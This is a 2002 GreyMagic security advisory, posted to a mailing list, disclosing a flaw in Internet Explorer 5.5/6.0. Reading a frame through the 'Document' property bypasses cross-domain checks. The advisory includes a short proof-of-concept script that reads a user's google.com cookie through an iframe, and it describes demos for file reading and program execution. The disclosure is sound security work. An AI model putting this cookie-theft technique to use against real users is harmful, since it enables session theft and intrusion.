OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: GreyMagic Software (security_at_greymagic.com)
Date: Tue Oct 15 2002 - 10:19:22 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    GreyMagic Security Advisory GM#011-IE
    =====================================

    By GreyMagic Software, Israel.
    15 Oct 2002.

    Available in HTML format at http://security.greymagic.com/adv/gm011-ie/.

    Topic: Internet Explorer : The D-Day.

    Discovery date: 26 Sep 2002.

    Affected applications:
    ======================

    Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are not
    vulnerable.

    Note that any other application that uses Internet Explorer's engine
    (WebBrowser control) is affected as well (Outlook under the Internet zone,
    MSN Explorer, etc.).

    Introduction:
    =============

    The <frame> and <iframe> elements may contain URLs in other domains or
    protocols, and therefore have strict security rules, which prevent frames in
    one domain to access content and information in another. Microsoft explains
    the issue in this Cross-Frame Scripting article -
    http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp.

    There are several ways to refer to an <iframe>'s (or <frame>) document in
    Internet Explorer (assuming <iframe id="oFrameId">):

    * oFrameId.document
    * document.all.oFrameId.contentWindow.document
    * frames.oFrameId.document
    * And others..

    All these methods are handled correctly by Internet Explorer and prevent any
    attempt to access a document that originates from a foreign domain.

    Discussion:
    ===========

    The <iframe> and <frame> elements are really instances of the WebBrowser
    control supplied by Microsoft. The WebBrowser control exposes several
    potentially dangerous properties by default, which Microsoft overrides in
    Internet Explorer.

    However, Microsoft missed out on one important property -- "Document", with
    a capital "D".

    Normally, using "oElement.document" would provide a reference to the
    document that owns the current element. The same applies to the <frame> and
    <iframe> elements. However, we discovered that when
    "oIFrameElement.Document" is used, the returned document is the one
    contained inside the frame, and there are no security restrictions in place
    to check if it's in a different domain.

    This provides free and full access to the frame's Document Object Model,
    which allows an attacker to steal cookies from any site, gain access to
    content in sites (forging content), read local files and execute arbitrary
    programs on the client's machine (script in the "My Computer" zone).

    Both Internet Explorer 5.5 SP2 and Internet Explorer 6 are vulnerable, but
    surprisingly this vulnerability does not exist in IE6 SP1. It's hard to
    believe that Microsoft actually meant to plug it as IE5.5 remains
    vulnerable, yet somehow this stray property is now protected.

    Exploit:
    ========

    This exploit demonstrates how an attacker may choose to read the client's
    "google.com" cookie.

    <script language="jscript">
    onload=function () {
    // Timer necessary to prevent weird behavior in some conditions
    setTimeout(
    function () {
    alert(document.getElementById("oVictim").Document.cookie);
    },
    100
    );
    }
    </script>
    <iframe src="http://google.com" id="oVictim"></iframe>

    Solution:
    =========

    Until a patch becomes available either disable Active Scripting or upgrade
    to IE6 SP1.

    Tested on:
    ==========

    IE5.5 Win98.
    IE5.5 NT4.
    IE6 Win98.
    IE6 Win2000.
    IE6 WinXP.

    Demonstration:
    ==============

    We put together four proof-of-concept demonstrations:

    * Simple: Reads the client's "google.com" cookie.
    * D-Day Console: Automatically load and execute commands on any site.
    * D-Day Reading: Read local files by accessing a res:// URL.
    * D-Day Execution: Execute arbitrary programs by accessing a res:// URL.

    They can all be found at http://security.greymagic.com/adv/gm011-ie/.

    Feedback:
    =========

    Please mail any questions or comments to securitygreymagic.com.

    - Copyright 2002 GreyMagic Software.